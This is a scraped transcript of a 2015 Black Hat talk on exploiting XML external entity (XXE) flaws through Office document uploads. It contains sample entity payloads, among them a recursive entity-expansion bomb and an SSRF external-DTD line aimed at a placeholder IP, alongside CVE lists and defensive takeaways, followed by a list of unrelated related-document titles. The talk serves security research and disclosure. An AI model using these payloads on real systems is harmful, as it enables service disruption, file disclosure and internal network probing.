EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY - · PDF fileEXPLOITING XXE IN FILE UPLOAD...

18
EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY BLACKHAT USA - 2015 Will Vandevanter - @_will_is_

Transcript of EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY - · PDF fileEXPLOITING XXE IN FILE UPLOAD...

Page 1: EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY - · PDF fileEXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY BLACKHAT USA - 2015 Will Vandevanter - @_will_is_

EXPLOITING XXE IN FILEUPLOAD FUNCTIONALITY

BLACKHAT USA - 2015Will Vandevanter - @_will_is_

Page 2: EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY - · PDF fileEXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY BLACKHAT USA - 2015 Will Vandevanter - @_will_is_

Agenda (25 minutes):

OOXML IntroXML Entity ExamplesFurther Exploitation

Corrected Slides, References, and Code:

oxmlxxe.github.io

Page 3: EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY - · PDF fileEXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY BLACKHAT USA - 2015 Will Vandevanter - @_will_is_

OFFICE OPEN XML (OPENXML; OOXML; OXML)*.docx, *.pptx, *.xlsx"Open" File Format developed byMicrosoftAvailable for Office 2003, Default inOffice 2007ZIP archive containing XML and mediafiles

Page 4: EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY - · PDF fileEXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY BLACKHAT USA - 2015 Will Vandevanter - @_will_is_
Page 5: EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY - · PDF fileEXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY BLACKHAT USA - 2015 Will Vandevanter - @_will_is_

GENERAL PARSING OOXML1. /_rels/.rels2. [Content_Types].xml3. Default Main Document Part

/word/document.xml/ppt/presentation.xml/xl/workbook.xml

Page 6: EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY - · PDF fileEXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY BLACKHAT USA - 2015 Will Vandevanter - @_will_is_

BUG BOUNTYFile Sharing Functionality[Content_Types].xml

Page 7: EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY - · PDF fileEXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY BLACKHAT USA - 2015 Will Vandevanter - @_will_is_

DEMO

Page 8: EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY - · PDF fileEXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY BLACKHAT USA - 2015 Will Vandevanter - @_will_is_

XMLENTITY

 

 

 

 

 

 

< !DOCTYPE root [     < !ENTITY post "1">]>

DOCX/word/document.xml

PPTX/ppt/presentation.xml

XLSX/xl/workbook.xml

Page 9: EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY - · PDF fileEXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY BLACKHAT USA - 2015 Will Vandevanter - @_will_is_

XMLENTITY

/_RELS/.RELSRelationship Id="rId1"Type="...relationships/officeDocument"Target="/word/document.xml"

< !DOCTYPE root [     < !ENTITY canary"/word/document.xml">

Relationship Id="rId1"Type="...relationships/officeDocument"Target="&canary;"

Page 10: EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY - · PDF fileEXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY BLACKHAT USA - 2015 Will Vandevanter - @_will_is_

XMLENTITY

DEMO 

 

 

 

 

Page 11: EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY - · PDF fileEXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY BLACKHAT USA - 2015 Will Vandevanter - @_will_is_

RECURSIVEXML

ENTITY

< !DOCTYPE foo [     < !ENTITY post "1">     < !ENTITY post1 "&post;&post;">     < !ENTITY post2 "&post1;&post1;">     < !ENTITY post3 "&post2;&post2;">     < !ENTITY post4 "&post3;&post3;">     < !ENTITY post5 "&post4;&post4;"> ]>

< foo> &post5; < /foo>

Page 12: EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY - · PDF fileEXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY BLACKHAT USA - 2015 Will Vandevanter - @_will_is_

RECURSIVEXML

ENTITY

APACHE POICVE-2014-3574

CVE-2014-3529

DOCX4J

OPENXML SDK

NOKOGIRICVE-2012-6685 (ish)

CVE-2014-3660

Page 13: EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY - · PDF fileEXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY BLACKHAT USA - 2015 Will Vandevanter - @_will_is_

+WEB APPLICATION

XSS Testing

User Interaction

LFI

Page 14: EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY - · PDF fileEXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY BLACKHAT USA - 2015 Will Vandevanter - @_will_is_

+ATTACHED FILES

Attached XML Only Media Types

XXE in Other File Formats

PDF (AR7, XFA, XMP)

Page 15: EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY - · PDF fileEXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY BLACKHAT USA - 2015 Will Vandevanter - @_will_is_

+OUTBOUND CONNECTIONS (SSRF)

External PUBLIC DTD<!DOCTYPE foo PUBLIC "-//B/A/EN" "http://[IP]">

externalTarget

Page 16: EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY - · PDF fileEXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY BLACKHAT USA - 2015 Will Vandevanter - @_will_is_

+TESTING CHEATSHEETClassic (X)XE in OXML

Canary Testing DTD and XE

XSS XE testing

XE LFI

Embedded (X)XE attacks

SSRF (X)XE

Page 17: EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY - · PDF fileEXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY BLACKHAT USA - 2015 Will Vandevanter - @_will_is_

SUMMARY POINTS(DEFENSE) The libraries that parse XML on one part of the

site (e.g. API) may not be the same ones that parse uploadedfiles; verify! Check configurations.

(DEFENSE) Patches exist, many are recent

(OFFENSE) Lots of surface area for exploitation

(OFFENSE) Untouched research targets

Page 18: EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY - · PDF fileEXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY BLACKHAT USA - 2015 Will Vandevanter - @_will_is_

QUESTIONS?http://oxmlxxe.github.io


XXE injection - Nguyễn Tăng Hưng

XXE injection - Nguyễn Tăng Hưng

Exploiting XXE in File Parsing Functionality DEMO XXE in docx PDF XXE Javascript that included XML with an XXE Exploited in Adobe Reader 7; 2005-06-15 Extensible Metadata Platform

Exploiting XXE in File Parsing Functionality DEMO XXE in docx PDF XXE Javascript that included XML with an XXE Exploited in Adobe Reader 7; 2005-06-15 Extensible Metadata Platform

Les grands espions du XXe siècle

Les grands espions du XXe siècle

MARTINIQUE LABEL « PATRIMOINE DU XXe SIECLE

MARTINIQUE LABEL « PATRIMOINE DU XXe SIECLE

Fonds Bougainville (XVe-XXe siècles)

Fonds Bougainville (XVe-XXe siècles)

Grenoble Architectures du XXe siècle

Grenoble Architectures du XXe siècle

XXe siècles

XXe siècles

L’architecture des musées au XXe siècle

L’architecture des musées au XXe siècle

Pavillons et villas XXe en Haute-Garonne

Pavillons et villas XXe en Haute-Garonne

Histoire du XXe siècle

Histoire du XXe siècle

Butz Arthur - La Mystification Du XXe Siecle

Butz Arthur - La Mystification Du XXe Siecle

Xxe advanced exploitation

Xxe advanced exploitation

SSRFvs.$Business-cri0cal$ applicaons: XXE$tunneling$in$SAP$ · XXE$tunneling$in$SAP$ $ $ Alexander$Polyakov$–CTO$at$ ERPScan$ ... – hNp://blog.spiderlabs.com/2012/05/too,xxe,for,my,shirt.html!

SSRFvs.$Business-cri0cal$ applicaons: XXE$tunneling$in$SAP$ · XXE$tunneling$in$SAP$ $ $ Alexander$Polyakov$–CTO$at$ ERPScan$ ... – hNp://blog.spiderlabs.com/2012/05/too,xxe,for,my,shirt.html!

La Mystification Du XXe Siècle

La Mystification Du XXe Siècle

XXE: advanced exploitation - DefCon-UA

XXE: advanced exploitation - DefCon-UA

Xml external entities [xxe]

Xml external entities [xxe]

Paypal XXE via Ektron

Paypal XXE via Ektron

Maurice Boulanger, illustrateur, France, début XXe

Maurice Boulanger, illustrateur, France, début XXe

LA GUERRE AU XXe SIECLE

LA GUERRE AU XXe SIECLE

XXe Siecle

XXe Siecle